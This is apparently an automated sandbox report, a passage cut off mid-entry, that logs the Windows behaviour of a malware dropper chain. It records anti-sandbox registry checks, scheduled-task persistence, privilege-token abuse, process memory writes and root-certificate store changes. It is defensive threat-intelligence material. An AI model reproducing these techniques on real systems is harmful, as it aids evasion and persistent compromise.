\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Q9_E6thG7mij2_I43zmvk8Rh.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI WerFault.exe -
Checks processor information in registry 2 TTPs 30 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
FmzEkQeE092RvzJXs6o8zx5r.exea1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exetaskmgr.exeIYEx72bTlmcph7YqkziCwtDG.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 FmzEkQeE092RvzJXs6o8zx5r.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Configuration Data FmzEkQeE092RvzJXs6o8zx5r.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data FmzEkQeE092RvzJXs6o8zx5r.exe Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 FmzEkQeE092RvzJXs6o8zx5r.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Previous Update Revision FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Revision FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Component Information FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\FeatureSet FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status FmzEkQeE092RvzJXs6o8zx5r.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 IYEx72bTlmcph7YqkziCwtDG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString IYEx72bTlmcph7YqkziCwtDG.exe Key enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Previous Update Revision FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Platform Specific Field 1 FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier FmzEkQeE092RvzJXs6o8zx5r.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5096 schtasks.exe 4488 schtasks.exe 5396 schtasks.exe 2540 schtasks.exe 2716 schtasks.exe 2812 schtasks.exe 5400 schtasks.exe 6068 schtasks.exe 5300 schtasks.exe 3484 schtasks.exe 5596 schtasks.exe 5016 schtasks.exe 4044 schtasks.exe 4008 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
Processes:
timeout.exetimeout.exepid process 3236 timeout.exe 1816 timeout.exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 620 tasklist.exe 4796 tasklist.exe 3228 tasklist.exe 6064 tasklist.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 2844 taskkill.exe 5404 taskkill.exe 4792 taskkill.exe 4116 taskkill.exe -
Processes:
LI3FA3IG15M57IM.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch LI3FA3IG15M57IM.exe Set value (str) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" LI3FA3IG15M57IM.exe Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync LI3FA3IG15M57IM.exe Set value (int) \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" LI3FA3IG15M57IM.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe -
Modifies registry class 1 IoCs
Processes:
win.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\Local Settings win.exe -
Processes:
Tue029560e6534e190c.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Tue029560e6534e190c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Tue029560e6534e190c.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 329 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeTue02522f9ea0b1.exeExplorer.EXEpid process 1692 powershell.exe 1692 powershell.exe 1664 Tue02522f9ea0b1.exe 1664 Tue02522f9ea0b1.exe 1692 powershell.exe 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
Explorer.EXETue026e182673.exetaskmgr.exenthost.exepid process 3020 Explorer.EXE 3624 Tue026e182673.exe 1332 taskmgr.exe 6052 nthost.exe -
Suspicious behavior: MapViewOfSection 21 IoCs
Processes:
Tue02522f9ea0b1.exeQ9_E6thG7mij2_I43zmvk8Rh.exeWerFault.exeExplorer.EXEpid process 1664 Tue02522f9ea0b1.exe 4132 Q9_E6thG7mij2_I43zmvk8Rh.exe 1708 WerFault.exe 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE 3020 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Tue02dc626f48.exeTue02976fcdf1.exeWerFault.exepowershell.exetaskkill.exeExplorer.EXEdescription pid process Token: SeCreateTokenPrivilege 3004 Tue02dc626f48.exe Token: SeAssignPrimaryTokenPrivilege 3004 Tue02dc626f48.exe Token: SeLockMemoryPrivilege 3004 Tue02dc626f48.exe Token: SeIncreaseQuotaPrivilege 3004 Tue02dc626f48.exe Token: SeMachineAccountPrivilege 3004 Tue02dc626f48.exe Token: SeTcbPrivilege 3004 Tue02dc626f48.exe Token: SeSecurityPrivilege 3004 Tue02dc626f48.exe Token: SeTakeOwnershipPrivilege 3004 Tue02dc626f48.exe Token: SeLoadDriverPrivilege 3004 Tue02dc626f48.exe Token: SeSystemProfilePrivilege 3004 Tue02dc626f48.exe Token: SeSystemtimePrivilege 3004 Tue02dc626f48.exe Token: SeProfSingleProcessPrivilege 3004 Tue02dc626f48.exe Token: SeIncBasePriorityPrivilege 3004 Tue02dc626f48.exe Token: SeCreatePagefilePrivilege 3004 Tue02dc626f48.exe Token: SeCreatePermanentPrivilege 3004 Tue02dc626f48.exe Token: SeBackupPrivilege 3004 Tue02dc626f48.exe Token: SeRestorePrivilege 3004 Tue02dc626f48.exe Token: SeShutdownPrivilege 3004 Tue02dc626f48.exe Token: SeDebugPrivilege 3004 Tue02dc626f48.exe Token: SeAuditPrivilege 3004 Tue02dc626f48.exe Token: SeSystemEnvironmentPrivilege 3004 Tue02dc626f48.exe Token: SeChangeNotifyPrivilege 3004 Tue02dc626f48.exe Token: SeRemoteShutdownPrivilege 3004 Tue02dc626f48.exe Token: SeUndockPrivilege 3004 Tue02dc626f48.exe Token: SeSyncAgentPrivilege 3004 Tue02dc626f48.exe Token: SeEnableDelegationPrivilege 3004 Tue02dc626f48.exe Token: SeManageVolumePrivilege 3004 Tue02dc626f48.exe Token: SeImpersonatePrivilege 3004 Tue02dc626f48.exe Token: SeCreateGlobalPrivilege 3004 Tue02dc626f48.exe Token: 31 3004 Tue02dc626f48.exe Token: 32 3004 Tue02dc626f48.exe Token: 33 3004 Tue02dc626f48.exe Token: 34 3004 Tue02dc626f48.exe Token: 35 3004 Tue02dc626f48.exe Token: SeDebugPrivilege 1632 Tue02976fcdf1.exe Token: SeDebugPrivilege 3120 WerFault.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 4792 taskkill.exe Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE Token: SeShutdownPrivilege 3020 Explorer.EXE Token: SeCreatePagefilePrivilege 3020 Explorer.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exeExplorer.EXESta.exe.pifpid process 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 3020 Explorer.EXE 3020 Explorer.EXE 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 5224 Sta.exe.pif 3020 Explorer.EXE 3020 Explorer.EXE 5224 Sta.exe.pif 5224 Sta.exe.pif 3020 Explorer.EXE 3020 Explorer.EXE 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exeExplorer.EXESta.exe.pifpid process 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 3020 Explorer.EXE 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 5224 Sta.exe.pif 5224 Sta.exe.pif 5224 Sta.exe.pif 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe 1332 taskmgr.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
zhangyan.exezhangyan.exeLI3FA3IG15M57IM.exepid process 4092 zhangyan.exe 4092 zhangyan.exe 5732 zhangyan.exe 5732 zhangyan.exe 1472 LI3FA3IG15M57IM.exe 1472 LI3FA3IG15M57IM.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1420 wrote to memory of 2368 1420 setup_x86_x64_install.exe setup_installer.exe PID 1420 wrote to memory of 2368 1420 setup_x86_x64_install.exe setup_installer.exe PID 1420 wrote to memory of 2368 1420 setup_x86_x64_install.exe setup_installer.exe PID 2368 wrote to memory of 2088 2368 setup_installer.exe setup_install.exe PID 2368 wrote to memory of 2088 2368 setup_installer.exe setup_install.exe PID 2368 wrote to memory of 2088 2368 setup_installer.exe setup_install.exe PID 2088 wrote to memory of 3988 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 3988 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 3988 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1760 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1760 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 1760 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 2204 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 2204 2088 setup_install.exe cmd.exe PID 2088 wrote to memory of 